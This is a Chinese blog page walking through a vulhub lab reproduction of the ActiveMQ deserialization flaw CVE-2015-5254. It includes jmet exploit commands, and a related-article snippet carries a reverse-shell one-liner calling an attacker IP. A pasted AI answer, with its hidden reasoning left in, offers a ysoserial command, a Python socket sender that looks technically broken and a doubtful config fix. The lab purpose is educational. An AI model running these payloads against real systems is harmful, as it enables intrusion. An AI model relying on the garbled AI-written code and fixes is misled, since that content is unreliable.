ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现

最新推荐文章于 2024-12-16 11:55:03 发布
原创 最新推荐文章于 2024-12-16 11:55:03 发布 · 687 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#activemq #网络安全

当前漏洞环境部署在vulhub,当前验证环境为vulhub靶场(所有实验均为虚拟环境)
实验环境:攻击机----kali
靶机:centos7
需要的jar包:jmet-0.1.0-all.jar
1、启动docker,进入vulhub(靶机)
在这里插入图片描述
2、进入CVE-2015-5254环境(靶机)
在这里插入图片描述
3、启动环境(靶机)
在这里插入图片描述
4、查看进程(靶机)
在这里插入图片描述
5、下载jmet-0.1.0-all.jar(时间较长):https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar(攻击机)
在这里插入图片描述
6、执行java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 你的IP 61616(攻击机)
在这里插入图片描述在这里插入图片描述
7、访问控制台:http://你的IP:8161/admin/browse.jsp?JMSDestination=event
触发
在这里插入图片描述
8、进入容器,docker exec -it cve-2015-5254_activemq_1 /bin/bash(靶机)
success 已成功创建,表明漏洞利用成功:
在这里插入图片描述

千其昂cm
关注
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 843
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)
Ayixy的博客
05-24 1033
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是。【命令解释】:调⽤java -jar 运⾏ jmetjar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载。阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成。使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡。
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
m0_74402888的博客
04-30 1703
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口,消息在这个端口上传递;
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1596
ActiveMQ 反序列化漏洞
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
oiadkt的博客
04-14 661
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
ActiveMQ 反序列化漏洞复现及利用
Tauil的博客
07-19 1299
会发现什么都没有发生,但是在被攻击机中输入bash-i>&/dev/tcp/攻击机IP/44440>&1他是可以正常连接的,说明命令没有问题,那么唯一的可能就是存在了检验,不给执行该命令,所以我们可以进行简单的绕过,将命令进行base64编码。java-jarjmet-0.1.0-all.jar-Qhacker-IActiveMQ-s-Y“bash-i>&/dev/tcp/攻击机IP/44440>&1-YpROME被攻击机IP61616。(一定要是java8!......
ActiveMQ反序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7904
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-优快云博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
CVE-2015-5254漏洞复现
m0_66912330的博客
12-13 1843
漏洞编号:CVE-2015-5254影响版本:Apache ActiveMQ 5.13.0之前5.x版本,https://www.cvedetails.com/cve/CVE-2015-5254/漏洞产生原因:该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。MQ(Message Queue):消息队列/消息中间件。消息服务将消息放在队列/主题中,在合适时候发给接收者。
精选资源
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 漏洞复现
wswr的博客
03-04 1334
前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-优快云博客_kali搭建靶场 原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。 Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现
baidu_38844729的博客
01-22 630
前言 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmetjar文件,并在同目录下创建一个external文件夹 链接:https://g...
ActiveMQ反序列化漏洞CVE-2015-5254复现
qq_40708881的博客
12-10 426
ActiveMQ反序列化漏洞CVE-2015-5254复现 导语 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞环境 git
ActiveMQ 反序列化漏洞CVE-2015-5254复现
weixin_42786460的博客
12-16 1655
ActiveMQ 反序列化漏洞CVE-2015-5254复现
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 3056
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现
WY92139010的博客
08-06 522
Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现 一、漏洞描述 该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 二、漏洞影响版本 Apache ActiveMQ 5.13.0之前的版本 三、漏洞环境搭建 1、官网下载ActiveMQ 5.11....
ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 4019
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
CVE-2015-5254ActiveMQ 反序列化漏洞复现
p_utao的博客
03-19 530
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
【vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 2409
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 反序列化漏洞CVE-2015-5254
最新发布
11-07
<think>嗯,用户想要了解ActiveMQ反序列化漏洞CVE-2015-5254的详细信息。根据提供的引用资料,这个漏洞主要影响5.13.0之前的ActiveMQ版本,核心问题是程序未对可序列化的类做限制。 用户是信息安全从业者或学习者,正在研究具体漏洞案例。从ta明确要求原理、影响和修复方案来看,可能需要用于实际漏洞分析或修复工作。引用中已经包含版本范围(5.13.0之前)、漏洞触发点(JMS ObjectMessage对象)、危害(远程代码执行)等关键信息。 需要补充的是漏洞技术原理细节:反序列化漏洞本质上是因为Java反序列化机制会执行特定方法的特性,攻击者通过构造恶意序列化数据,在ObjectMessage反序列化时触发恶意逻辑。引用[1]和[3]提到的"特制序列化对象"就是指包含恶意代码的gadget chains。 修复方案方面除了升级版本,还应强调临时缓解措施,比如配置ActiveMQ的org.apache.activemq.SERIALIZABLE_PACKAGES白名单。这点在现有引用中未提及但很重要。 相关问题的设计要覆盖漏洞利用链(ysoserial工具)、检测方法和企业级防护方案,这样既能满足深度研究需求,又具有实操价值。特别要注意提醒用户复现漏洞必须在内网环境,避免法律风险。 最后检查所有漏洞版本描述是否一致:引用[1][3]明确是5.13.0之前,引用[2]的5.11.1在范围内,说明准确。 </think>以下是关于 **ActiveMQ反序列化漏洞CVE-2015-5254)** 的完整技术分析,结合漏洞原理、影响范围、修复方案及复现细节: --- ### **漏洞原理** 1. **根本原因** Apache ActiveMQ **5.13.0之前**的5.x版本未对代理中传输的序列化类进行限制(`org.apache.activemq.SERIALIZABLE_PACKAGES` 配置未启用严格过滤)。攻击者可构造恶意的序列化 `ObjectMessage` 对象,通过JMS(Java消息服务)发送至ActiveMQ服务器。 - **触发点**:当ActiveMQ反序列化恶意对象时,会执行其中嵌入的任意代码(如利用Java反序列化漏洞链,常见于`commons-collections`等库)[^1][^3][^4]。 2. **攻击路径** ```mermaid graph LR A[攻击者构造恶意ObjectMessage] --> B[通过61616端口/TCP发送至ActiveMQ] B --> C[ActiveMQ反序列化对象] C --> D[恶意代码在服务器执行] ``` --- ### **影响范围** | **项目** | **详情** | |------------------|--------------------------------------------------------------------------| | **受影响版本** | Apache ActiveMQ **5.0.0 - 5.12.3** | | **不受影响版本** | Apache ActiveMQ **≥5.13.0**(修复版本) | | **漏洞验证** | 登录管理后台(默认`http://<IP>:8161/admin`,账号`admin/admin`),检查版本号[^2]。 | --- ### **漏洞复现关键步骤** 1. **环境搭建** - 启动漏洞环境:`docker run -p 61616:61616 -p 8161:8161 rmohr/activemq:5.11.1` 2. **生成攻击载荷** 使用 `ysoserial` 工具生成恶意序列化对象(示例): ```bash java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2015-5254" > payload.ser ``` 3. **发送恶意对象** 通过Python脚本将 `payload.ser` 作为 `ObjectMessage` 发送至ActiveMQ的 **61616/TCP** 端口: ```python import socket with open('payload.ser', 'rb') as f: data = f.read() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('192.168.83.136', 61616)) sock.send(data) # 触发漏洞 ``` --- ### **修复方案** 1. **立即升级** 升级ActiveMQ至 **5.13.0或更高版本**(官方已修复此问题)。 2. **临时缓解措施** 在 `activemq.xml` 配置文件中限制可序列化的包路径: ```xml <broker ...> <transportConnectors> <transportConnector name="openwire" uri="tcp://0.0.0.0:61616?serializablePackages=java.lang,java.util,org.apache.activemq,org.fusesource.mqtt.client" /> </transportConnectors> </broker> ``` 3. **加固建议** - 禁用默认密码,修改管理后台凭证。 - 限制61616端口的访问来源(仅允许可信IP)[^1][^4]。 --- ### **漏洞危害** - **最高风险**:远程攻击者可在目标服务器上 **执行任意代码**(RCE),获取系统控制权。 - **利用场景**:内网渗透、供应链攻击(通过消息队列传播恶意载荷)[^3][^4]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值